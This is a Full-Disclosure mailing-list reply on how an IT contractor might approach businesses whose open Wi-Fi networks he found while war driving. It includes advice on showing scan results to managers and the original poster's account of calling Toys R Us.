Re: [Full-disclosure] Wi-fi. Approaching customers Gregh, IMO, you're covered legally. I know it sounds fishy to approach a potential client already knowing they're insecure...but don't all of us to that on a regular basis? I mean I will hit google with a vengence before I go into the kick-off meeting...I want to know what I'm up against. I would respectfully request some time from a technical manager to present your findings (show a kismet/netstumbler scan) and explain the dangers (not the solutions of course). Hopefully, this will rattle the manager enough to get the word up to upper management, and if you've left some marketing material for them to look at, they can contact you for your services. Good luck! Wade I have asked this on another list and there has been discussion but nothing that really seems like an answer so I am asking for help in here. I did a war drive (and in MY terms that means just driving along gathering SSID data showing open and closed and nothing else BUT that) and found one HELL of a lot more wi-fi in my area than I had previously been aware existed. Most of the SSIDs broadcasted didn't openly identify the company involved though most of them were open. The idea in doing this was that I could note an area where wi-fi is and approach the company (or individual) and offer my services to LEGALLY lock their open wi-fi down. I realise that with open wi-fi, I could be doing anything I wanted to or with their systems but that isn't the point. I work in the area doing I.T. related work and so far have a very good reputation for an inexpensive service and I am self employed so doing the wrong thing would quickly kill all that. My question is, then, how to approach someone to legally get work from them fixing their badly installed wi-fi and ensuring it is all locked down. If I turn up saying Your wireless networking is open to hacking and I can fix it that sounds somewhat suspicious to me if you look at it from the point of view of a user who knows nothing much about it all. Eg, I am telling them something they don't want to hear, for a start and then telling them that if they pay me, they can have it fixed on the spot. I already know how strange it can sound. I happened to pick up the SSID ToysRus which was open and realising they would have their own company employed I.T. people, I just rang them to do them a favour and wasn't I met with suspicion? Yep! All I did was say You know you have wireless networking? and they answered yes and I added It's open and unsecured. You better fix it before someone else finds it and then got asked 100 questions including How do YOU know? blah blah by someone you would think KNOWS the game. How do YOU approach prospective new customers to tell them their wi-fi is unsecured and needs attention and that you can fix it for a fee? Any help appreciated. Greg. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://www.secunia.com/ The reason why you have people breaking into your software is because your software sucks. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://www.secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://www.secunia.com/